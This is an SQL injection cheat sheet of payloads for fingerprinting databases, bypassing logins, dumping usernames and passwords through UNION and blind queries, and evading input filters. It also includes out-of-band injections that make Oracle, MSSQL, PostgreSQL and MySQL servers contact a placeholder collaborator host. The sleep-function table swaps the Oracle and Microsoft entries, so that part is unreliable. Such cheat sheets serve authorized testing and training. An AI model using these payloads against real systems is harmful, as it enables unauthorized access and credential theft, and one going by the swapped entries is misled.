SQL Injection

Table of contents

• DMS Information
  • DMS version
  • DMS content
• Login Bypass
• Union Based Attack
  • Getting column number
    • Using ORDER BY
    • Using UNION SELECT NULL
  • One column injection
• Blind Injection Attack
  • Boolean
    • Using Substring
    • Using Error
  • Time Based
  • OAST Attack
    • Using DNS Lookup
• Insert Injection
• DMS Diffenrences
  • SQL comment
  • String concatenation
  • Length
  • Substring
  • IF statement
  • Sleep
• Bypass Filters
• Wordlists
• Other Cheat Sheet
• Interesting Writeups
• My Challenges

DMS Information

DMS version

Oracle
SELECT banner FROM v$version
SELECT version FROM v$instance

Microsoft|MySQL
SELECT @@version

PostgreSQL
SELECT version()

DMS content

Oracle
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name = '<table-name>'

Microsoft|PostgreSQL|MySQL
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columns WHERE table_name = '<table-name>'

---

Login Bypass

' OR 1=1 -- -
<username>' OR 1=1 -- -
<username>' #
<username>'/*

Dumping credentials

' AND <password-column-name> LIKE '<letter>%' -- -

---

Union Based Attack

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

Condition :

• Same column number for each query.
• Type must match for each column. (ex : a and c - integer...)

Getting column number

Using ORDER BY :

' ORDER BY 1 -- -
' ORDER BY 2 -- -
' ORDER BY 3 -- -
...
The ORDER BY position number 3 is out of range of the number of items in the select list.

Using UNION SELECT NULL :

Oracle
' UNION SELECT NULL FROM DUAL -- - # Oracle DMS must use FROM statement

Other
' UNION SELECT NULL -- - # Using null to respect type condition
' UNION SELECT NULL,NULL -- -
' UNION SELECT NULL,NULL,NULL -- -
...
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

One column injection

' UNION SELECT username || '~' || password FROM users -- -

Click to see different DMS string concatenation.

---

Blind Injection Attack

Boolean

' AND 1=1 -- - # True
' AND 1=2 -- - # False

Using Substring :

' AND SUBSTRING((<sub-query>), 1, 1) <operator> '<letter>' -- -

Examples :

' AND SUBSTRING((SELECT password FROM users WHERE username = '<username>'), 1, 1) = '<letter>' -- -
    True : letter equal <letter>.
    False : letter different than <letter>.

' AND SUBSTRING((SELECT password FROM users WHERE username = '<username>'), 1, 1) > '<letter>' -- -
    True : letter greater than <letter>.
    False : letter equal or lower than <letter>.

Click to see different DMS substring functions.

Using Error :

TO_CHAR(1/0)
CAST('test' AS INT)

Examples :

' AND (SELECT CASE WHEN (SUBSTRING(password, 1, 1) > '<letter>') THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username = '<username>')='' -- -

'||(SELECT CASE WHEN SUBSTR(password, 1, 1)='<letter>' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='<username>')||'' -- -

Time Based

Click to see different DMS sleep functions.

OAST Injection

Using DNS Lookup :

Oracle
The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')

Microsoft
exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'

PostgreSQL
copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'

MySQL
The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

---

Insert Attack

---

DMS Diffenrences

SQL comment

Oracle
--comment

Microsoft|PostgreSQL
--comment
/*comment*/

MySQL
#comment
-- comment
/*comment*/

String concatenation

Oracle|PostgreSQL
'foo'||'bar'

Microsoft
'foo'+'bar'

MySQL
'foo' 'bar'
CONCAT('foo','bar')

Length

Oracle
LENGTH(<string>)

MySQL|PostgreSQL
CHAR_LENGTH(<string>)

Microsoft
LEN(<string>)

Substring

Oracle
SUBSTR('foobar', 4, 2)

Microsoft|PostgreSQL|MySQL
SUBSTRING('foobar', 4, 2)

IF statement

Oracle If Statement
BEGIN
IF <condition> THEN <true-condition>; ELSE <false-condition>; END IF; END;

MySQL
IF(<condition>,<true-condition>,<false-condition>)

SQL Server
IF <condition> <true-condition> ELSE <false-condition>

PostgreSQL
SELECT CASE WHEN <condition> THEN <true-condition> ELSE <false-condition> END;

Sleep

Oracle
WAITFOR DELAY '0:0:10'

MySQL
BENCHMARK()
sleep(<time>)

PostgreSQL
pg_sleep(<time>)

Microsoft
dbms_pipe.receive_message(('x'),<time>)

Multiple query

Oracle
Can't use multiple query.

Microsoft|PostgreSQL|MySQL
<first-query>; <second-query>

---

Bypass filters

Space before parenthesis :
CAST ('x' AS DECIMAL)

Without comma :
-1 UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Space :
%09, %0A, %0C, %0D, %0B, %a0

Quotes :
CHAR(<hex-number>)

Raw hashing :
md5("ffifdyop", true) = 'or'6�]��!r,��b� # Can be guess using BF
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!

---

Wordlists

Coming Soon...

Other Cheat Sheet

• https://portswigger.net/web-security/sql-injection/cheat-sheet
• http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
• https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Interesting Writeups

• https://akashroxstarz.medium.com/hey-waf-better-luck-next-time-a1df7f444863

My Challenges

Coming Soon...